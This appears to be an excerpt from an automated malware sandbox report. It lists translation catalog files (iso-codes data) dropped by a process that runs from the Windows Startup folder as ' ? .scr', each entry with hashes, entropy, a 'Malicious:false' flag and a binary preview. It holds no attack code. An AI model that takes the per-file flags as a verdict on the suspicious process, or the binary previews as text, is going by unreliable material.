                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 178 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10986
                                                                                                    Entropy (8bit):5.345365190245807
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Vzm1ustf9EElKtU4WjV3a5hW8KxLS6VHVryu97:J43rB4WjV3a5hW8Kxl5y0
                                                                                                    MD5:D21BB77869863C307F19DA2881E86E44
                                                                                                    SHA1:078B1F56246262C8D37DD33B48AC0EB6207235CA
                                                                                                    SHA-256:9ADDE0E5667AA6B7DBEB8F96A3A20661B8640DEB4A9F02AEEE11D34000A1D909
                                                                                                    SHA-512:7CBFC1D14C6E69BDA4DCE20B9A676567E136EE1E5209150592A8300273B969645562B1D9DF183EBB343AE620041BB14B3F5ED941E6C9894C071BAC14F7D55167
                                                                                                    Malicious:false
                                                                                                    Preview:........................<...................................?...........T.......[.......u.......~.......................................................................................................................................................&.......,.......F.......M.......h.......p...&...y...................(...................................&...............@.......U.......`.......g.......o.......u.......~...........................,...................................5.......<.......E.......V.......g.......}...&...............4...................(.......0.......7.......?.......H.......Q.......\.......p...........................#...........................................................$.......;.......@.......O.......U.......^.......g.......u.......z...............................................................................................&.......;.......J.......X...(...b...................................-...............!..........................."...#...(.......L..."...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 202 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10906
                                                                                                    Entropy (8bit):5.083495892834184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:GKGhK5w/V++Bap/te8zJ2kTD06/WgJ8kuyheKjRaxGfgKE/fpF2krWyJw3tMW4b6:GzhK5wBw/e8zJR/P/WgJ8kuieKs8gXXK
                                                                                                    MD5:7D39E68537B00DE0D1D6827F85A7CB43
                                                                                                    SHA1:790B889649073F54DB47D1B0039FD5D0BEF7244E
                                                                                                    SHA-256:C79CB6AB4569B2969B4802F54F347FB7F39A39F8B7D7AB4B757E39FDE23F286C
                                                                                                    SHA-512:ABD0BC4512EC59DC154D46177BDFFF803DF498836D5100EFFF203AC27C313CB965AFC4CC2C55E67B9EF66027AA0334A2E0B762E27E929297990B073FC33674CA
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............................................................$.......+.......?.......I.......Q.......W.......a.......i.......t.......|......................................................................................................................./.......8.......E.......M.......V......._.......f.......u...............................................................................................................................................1.......9.......B.......P.......o.......t.......|...............................................................................................................................................................%.......+.......5.......:.......B.......b.......i.......o.......w.......}.......................................................................................................................................................!.......'.......2.......=.......G.......O.......V.......^.......e.......n.......y...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3619
                                                                                                    Entropy (8bit):4.814355331444809
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:k/+QuibxnCRAdukmiJbq/HlxHUJpAhYJb3S:6dxnCzkrbq/F+Jb3S
                                                                                                    MD5:A663CE16CA7C6E59813F6FE70802ADA0
                                                                                                    SHA1:233D174094C4F692DED53D285D84434FC2BF79DE
                                                                                                    SHA-256:B310427FA554D4880227E2BD39DC110480B59047B16442ADDB735428E5026693
                                                                                                    SHA-512:71DAE1207BA1DE339F9119736C91376D9B56B8C492696DAD35D771B97DF836680E2AF0FD48EC0EDA1B035995895AD5963E96E2784AF50C198DB039D799E10DAC
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...................................................................................................................................$.......-.......A.......H.......N.......W.......q...................................................................................................................................................................(...%.......N.......W......._.......q.......{....................................................................................................................................... .......).......0.......9.......X.......^.......e.......l.......t.......{...............................................................................................................................................................................................%.......+.......4.......N.......W.......^.......g.......o.......v.......~.......................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23789
                                                                                                    Entropy (8bit):4.99548909062309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosMrrf7Z9WaBct46nbjz5wsWP48WAINiZGh+S8c5+szTECyAg/qKIm1IA:0ojD7ZIaBct48fmsWP48WAITZ+wxyAgv
                                                                                                    MD5:F3C7DCFCFE760847019CF002AF73E547
                                                                                                    SHA1:6F22D2E6CA3497BFE1AE890D6FB8104420077D67
                                                                                                    SHA-256:6D972F0CE5692F2EBDDDCB1DCC96BD114E923BABC38BEA9CB935820CD77314CE
                                                                                                    SHA-512:687668D2F4E67C948DB87817AA7E211AE9C5BAA6ECFBDC0FF59F352AC4094169DD6AD060F5EBE057A222AF432EAB1EF46944618C2F58AEC4D32E6C0B70FFBA31
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 828 messages, Project-Id-Version: iso_3166-2 'Abidjan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34985
                                                                                                    Entropy (8bit):4.927418963960025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:/87DI/6+O4ewh/GCIylRqDese7sKNubzJzJr8sFV4yMlpV9A2:07gO4PuylRqDesGsKGx58sFVQn62
                                                                                                    MD5:9F8E4051F4E11E0A515D16870D9C5B68
                                                                                                    SHA1:B9651D08EFF81D31A20FDAD11DA2A9CEEACBC0EE
                                                                                                    SHA-256:61070703000E13B774CBA2946198AC9F73489FCA03B72D9595D6EE9E3E7581EA
                                                                                                    SHA-512:44CD3CC1CF2B35AAC38FDD3E4562DAD09B1C2F56C5C3DAFA047EE17EFA3AC9649E87FDCE2111D101C5F054AAEE20698359601027FFB977BF58E910D23B080B28
                                                                                                    Malicious:false
                                                                                                    Preview:........<...........U....3......0E......1E......9E......BE......NE......VE......[E......dE......pE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F......!F......-F......4F......;F......CF..$...LF......qF......yF.......F.......F.......F.......F.......F.......F.......F.......F.......F.......F.......F.......G.......G.......G.......G......&G....../G......8G......>G......DG......MG......SG......YG......]G......oG......yG.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......H.......H.......H......"H......)H......3H......9H......DH......KH......SH......^H......cH......oH......yH.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......I.......I......#I......0I......<I..$...BI......gI......yI.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......J.......J......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Tiriogaeth Antarctig Prydain'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2876
                                                                                                    Entropy (8bit):5.2085235263475935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3s/el2RNxH55+vGqIfdvqN5CoURICfz1g3ChXhuv6qNSGHAhP8EPBFjxw:rLvO5+yaCoOIUxhuigJEm
                                                                                                    MD5:B5B939C2556755389D3F19C9DAF66B54
                                                                                                    SHA1:6CA7C24B1D260516871559BA1BF110EFBA7C3B4A
                                                                                                    SHA-256:035A5C3493ACD3093C728FAFD72446FE517A8BE8FEFC4C8BD234A2F3C0C8FF2A
                                                                                                    SHA-512:8A576911D8835DC6D497F6F833EF02F65DC6DE6AC153FB0448550AF88D623280611505053028D0B062F96D2AA42B87B09EF9CFC3E7B6344DB786DB434A2C4DAE
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................#.......,...7.......d...3...............................................$.......#.../.......S.......m.......{...........................1..................................."...$......./...S...........!...............2.......-...........)........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 35 messages, Project-Id-Version: iso_4217 'Manat Aserbaijan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1790
                                                                                                    Entropy (8bit):4.848397119905576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:f/D8Nl0RARRbnb0ewAxsgqKmUQc+Cf2UU:f7830RARNnb0/m5mzc+U2f
                                                                                                    MD5:CC5B08F4A55062A71CB830D5C8F5E82D
                                                                                                    SHA1:FDA033FEEEA3EACCDBBED653E33224A7976635D1
                                                                                                    SHA-256:43F5C003DC2E29E4E321F0357D3C91B379533DD05BC3FA9FDFC1D179892F967F
                                                                                                    SHA-512:E276DC6D31CA640C52D707A7A200D14729F57D0A80698FCDBE4F4207D3EC21BC7EB5847DF9BB5D58CD6CE5BB92D9ABE9185FB7383C98ACBF0A73263ADBD7FC5A
                                                                                                    Malicious:false
                                                                                                    Preview:........#.......4.../...L.......................................&.......5.......;.......A.......F.......K.......S.......[.......`.......e.......i.......o.......y.......~...............................................................................................................................................................................&.......2.......8.......>.......C.......G.......O.......W.......\.......a.......e.......k.......u.......z...................................................................................................................................................................................#...........!............................... ......................................."................................................................Azerbaijan Manat.Baht.Balboa.Brazilian Real.Denar.Dobra.Dong.Gold.Guarani.Hryvnia.Kina.Kyat.Lek.Leone.Lilangeni.Loti.Naira.Ouguiya.Palladium.Pataca.Peso Uruguayo.Platinum.Pula.Rand.Silver.Sol.Somoni.Tala.Tenge.Tugrik.Unidad
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 371 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14506
                                                                                                    Entropy (8bit):4.629214974014564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:se7rRjWVXP9/k2vTGwXDVYrIhWdjUnzVmz3Gzs3wAeB3Rl:d7rWJz0DP349Rl
                                                                                                    MD5:33674312445DA079EB817D1726BA0DBE
                                                                                                    SHA1:63FF041185133D56111D20E47BF7CC2BAA0C47C7
                                                                                                    SHA-256:37424C5CDF57DB2E6801CDC5A69C05FF67A3A790DD00E3A7B1B3EDD8245A6A2B
                                                                                                    SHA-512:8A1F976DF13C4C7DAB9A575769BDEFF1F3D12A38CC4331DDB491C25B187C3B64F23533AE888C88AE88FF9896AC4E621D9B46F441AA0FCF1DB4FBCEE4E46F2D9A
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................".......'.......,.......3.......9.......E.......M.......R.......X.......e.......l.......v........................................................................................................................................................ ....... ....... ....... ....... ......! ....../ ......7 ......= ......D ......K ......P ......T ......Z ......_ ......f ......o ......y ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!.......!......"!......(!.......!......4!......<!......@!......E!......M!......U!......[!......`!......h!......r!......x!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......%"......."......6"......;"......B"......K"......Q"......Y"......_"......h"......t"......|"......."......."......."......."......."......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_639-5 'Ieithoedd Affro-Asiaidd'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2109
                                                                                                    Entropy (8bit):5.061040030128704
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:XSNPUclJuEcGbhFiEZCUgCCfpxZQrVOhBcotZsSY:XZcAG+uCPCU3ZQ8sSY
                                                                                                    MD5:4A49EF7F6C499201AEA8054F71060876
                                                                                                    SHA1:E89CE52604FA8E4DC5F66AAD6BCF5887D3BB7F56
                                                                                                    SHA-256:5763B0F3B3176F607ECB88825560993DF5E78F727F3496CDD3922F0A8420EE6D
                                                                                                    SHA-512:953485BF74EE98D179BC295BEDC1F4A707659AACC1305FDF7C673D9BEAED0CA2A45FC31D32BB3397CEBB3D305F4C055E996A0526A2CAFBB1DA33197F2A01DC41
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......x.......................................................................#.......3.......C.......T.......e.......y...!...................................................................&.......7.......F.......O.......g.......~.......................................................................%.......5.......F.......W.......l...............................................................................)........................................................................................................................................................Afro-Asiatic languages.Algonquian languages.Apache languages.Armenian (family).Artificial languages.Athapascan languages.Australian languages.Baltic languages.Bamileke languages.Banda languages.Basque (family).Batak languages.Berber languages.Bihari languages.Caucasian languages.Celtic languages.Central American Indian languages.Germanic languages.Greek languages.Ijo languages.Indo-Europe
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10182
                                                                                                    Entropy (8bit):4.979968945733408
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHHcY56DxCB1EXltU4WjV9qWxa5hW85jxZHwursjp2DC26v:5cYsFCXmg4WjVDxa5hW85jxZ/Qjp2w
                                                                                                    MD5:DA646603AEE0A76B2A683B7172CD9918
                                                                                                    SHA1:1B019DF9255FB22963F25BE722BB80EABE066E3A
                                                                                                    SHA-256:36386AD45E99BC8BDDA51DB1CB7B101A3BD89E8A6AE1598562A02C1E1B74C856
                                                                                                    SHA-512:254F49BF282EF5BAA9A6D2E75BD5BD78A881DBC304D8CC8BBBD59E169430F69071C70D08FAD251968D6A6DEFF9EF4712D6FD0295610FE6CDE92D8EF40535AD78
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23328
                                                                                                    Entropy (8bit):5.018273806970824
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DaPyE7e5w9OJK/Ubjh5wsWP4XdAIzirGIdK0c6wzyAoxW:jhZet7ei9O4ItmsWP4XdAIKKD6wzyAow
                                                                                                    MD5:5E2B60EC8A14BCCF69E824DC4586817B
                                                                                                    SHA1:2E87452C2810CE9DB7A3BE761413B97162BD394D
                                                                                                    SHA-256:B066043BA0D4C1E3A75C4BA3313BDA0D125F2BD0C46F68BC106FA47929297ADC
                                                                                                    SHA-512:C57DE1734B8B8F40E9B06EF881820562A55AF0C9A8C3A8E7A5D84B18623F8BA5D4D4720CA2474200DBC8DE81813C8AE1B3E0D84D094370875066A7A5D8844456
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3200 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):134479
                                                                                                    Entropy (8bit):5.204971419194627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:51pl1ysUdlvE99kiyGpeNT2OsDYdBQe4rQVhtsPNh9EbOQY:78sOE9uYpRGBQD5PNIO
                                                                                                    MD5:07CC70236A0CF4F6B9DD65907869ECF9
                                                                                                    SHA1:C09B6D24F5A8288990C46D3385D3252F6DDAF6F9
                                                                                                    SHA-256:798EB4B9439DDF59AB8D0E32C6A894455E65509F70EDE06A7EB5A35C94CA590B
                                                                                                    SHA-512:7C23B30CCC1702ECC82F74A950559B8B684A4DD3C036EED8214BF6E656C62FE03D14D6DE61F90AC578407DD127A820BFD43F59E33730379FD91369B212DCDC25
                                                                                                    Malicious:false
                                                                                                    Preview:.................d..............................................................................................".......*.......3.......8.......@.......E.......T.......].......c.......l.......r.......|..............................................................................................................................................."......./.......5.......;.......C.......M.......Y.......i.......t.......................................................................................................$...............8.......B.......J.......T.......a.......k.......z...............................................................................................................................$.......0.......6.......A.......I.......P.......W.......`.......p.......................................................................................................................................".......>.......M.......U.......f.......r.......y...............................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britisk Antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2671
                                                                                                    Entropy (8bit):5.1908209924976605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADl16aZvGqIfdvqNuoUBW79MhWzy6BBSchZIVRBIVve:qDNZyBoQWGAzsVIV2
                                                                                                    MD5:040E3165DB8298EF8743A97A5DBFEA3D
                                                                                                    SHA1:68D5236438F7600CD1528B834AD0A3D112648A9A
                                                                                                    SHA-256:BA3AC60995093A39E16528D817BCDCB86F092E106D376F3992D423A9194B0BCB
                                                                                                    SHA-512:DE7DABB4FD80EDEADB19AEB67BAC23B4D97B83B22DFFFD3E4157E535A4657FAB6DE8BDD5A70371BAF93927F562110AE2F305FBA264ACA9D1D9A257C8F5C44CC5
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................{...&....... ...............<...........-.......5.......H.......R.......p...-...........................................................(...&...6.......].......n...................&.......0..............."...........*...%...6.......\........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'ADB-regningsenhed'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8861
                                                                                                    Entropy (8bit):4.94409603520824
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmK6T5B3rbJ5CdgjCnMLCkhSCHzycTHC2o:TIDmKQHb/Cdgmn2DICuGo
                                                                                                    MD5:20BCDEA65E82CABB809842B88BE2A2E4
                                                                                                    SHA1:236CA718D43396C0BFCDC0DA765503CF67B492D0
                                                                                                    SHA-256:B08514E6C11FF3DFADAD340083112A4F9EB6C4F8B9CF4DE1515A912D5CCECFDA
                                                                                                    SHA-512:BD121ED5671A7429D8119E9DD3DF27130294754D73FF4B5A73BEB7F63D5B8CF884BEFF46EE950562E11C7F2D27F1BAC65898B9915E7A4612D7D6A5ED4226E615
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 434 messages, Project-Id-Version: iso_639-3 'Abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19729
                                                                                                    Entropy (8bit):4.844412180043196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:h/pLczZjktHeMvNiuDNGKYGrEchMLy7sFMo4xQ5nhYUsPLxNdH6x8TKTxsFzDv:7L26tNyGrXM6I7hYUmFNdHSaFn
                                                                                                    MD5:0D48230072A95B2A8623F1A43E62EF46
                                                                                                    SHA1:54D659745E17406E323AE4C359933EC02BCC265E
                                                                                                    SHA-256:6A95B8FC67019CA231035813943E3B08A22744B8A81D9E419EEF20AAC0986ECB
                                                                                                    SHA-512:8C3259C2055092562554A6436726DF633A2E8223037EE993CB929A3CCA9E1128D178118AEAC49FCCC0E67DF73D364AF35F77653F923BB3D84FA2D079A01A9D8E
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...<.......h$......i$......s$......|$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......&%......>%......G%......^%..#...g%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&.......&......'&......>&......F&......K&......c&......j&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'......"'......8'......G'......Q'......Y'......a'......r'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......#(......,(......2(......9(......>(......D(......J(......^(......d(......m(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......)......-)......1)......8)......>)......F)......M)......U)......k)......o)......v).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'afroasiatiske sprog'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3961
                                                                                                    Entropy (8bit):4.809002785236461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:0WMVvUP+R0E0C+fICq4fOYUpsdO0AS6p0iExH4zx/MIV57XNiQaC4KTU:0WM+s0E0Jvu9K
                                                                                                    MD5:B454537F8C544FCE9F1A5F0697CB39F6
                                                                                                    SHA1:C66E745194FA10A29893429ACB6C4ADEC1D9225B
                                                                                                    SHA-256:4712C4C9CD177BE096B262576341FB56D5CC9CE6638B21DA8A9604FC8119AC00
                                                                                                    SHA-512:169F3843AE8D9AAD427EC8F463E57B75B7835AF714DFF21F45995E8E8B2859CA2E22E6E34B31D37DA08FF3A36704E218C0912B70AB70B572366520D60929850C
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...............................................................................................................................:.......F.......U.......e.......v...!.......................*...................................&.......6.......@.......N.......d.......r.......................................................................................*.......J.......j.......x......................................................................................."...............=.......G.......R.......a.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10383
                                                                                                    Entropy (8bit):5.106354303750374
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dYPr9FiCewWltU4WjV9qWxa5hW8IGCa8X1O8dWoGh0U:O5+wWg4WjVDxa5hW8Wlj2h0U
                                                                                                    MD5:B7AF7ECE1E059585180BC11FE251D92D
                                                                                                    SHA1:3EF7AA7A0A628F0823BCE34EFDCF13B9D56C445B
                                                                                                    SHA-256:658ACE7183BB994D87B432A8E37D54D5D9609EC49EA671F73D534887A94C13D9
                                                                                                    SHA-512:32CA200072B3B473A8D94681F4C64BC13D36A3C1567B2C0CC8FF42ABCC26156532A29E9ADCC33927A5BDDA600CE080C5A3E195A8CB141193F8234720878683C2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23454
                                                                                                    Entropy (8bit):5.024676808887406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosIXawPgMUIt46nbjz5wsWP48WAINiZGI0TtbggKV/A+s+:0oRPfUIt48fmsWP48WAIVTtbhS/AL+
                                                                                                    MD5:55E78511F0A1F8C3F03A44D116D63388
                                                                                                    SHA1:09DAE79158DC1A7220D4AE3B80BB939C80C350FD
                                                                                                    SHA-256:EB58CDF4CAB2459F90434B2D6F8E293A7F7116F767CB5DCFD15064B055179F1B
                                                                                                    SHA-512:DADAB2B846130159BE25430364E36CAF2F0F2197961347F846CBB5D0C586F49F30E7450E197C690BA804DA60017B9625825CC983F1A32CB88ECB1D63859D43C2
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4820 messages, Project-Id-Version: iso_3166-2 ''As\304\253r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):212230
                                                                                                    Entropy (8bit):5.360128994632522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:CrH9lLz7OUzU126JaHUki28Ms2o6IqKNuq1R9qwMP5T9XkNbvseeFiB11m6PI0YS:C5lv7ca0o/jo6IQhT9UNwkYNons38
                                                                                                    MD5:FBC3184600F4C885296F36AB500ADCCD
                                                                                                    SHA1:18DB52AEA5D8FA61653D091AF853B19B2C3DD475
                                                                                                    SHA-256:466AAB6A14A6AABFEE4CE464F34B404C3252D0F6F28336F1DDA972658ED7AA19
                                                                                                    SHA-512:B01C184AAECF7FC7101D40070314641D14D75FF47D22D01DBA337D0941BDDD084C30D7B9985FC376B2CE54C24B8C4DE1CCC3227F2E322DE6F3BFBC7838FD5CF5
                                                                                                    Malicious:false
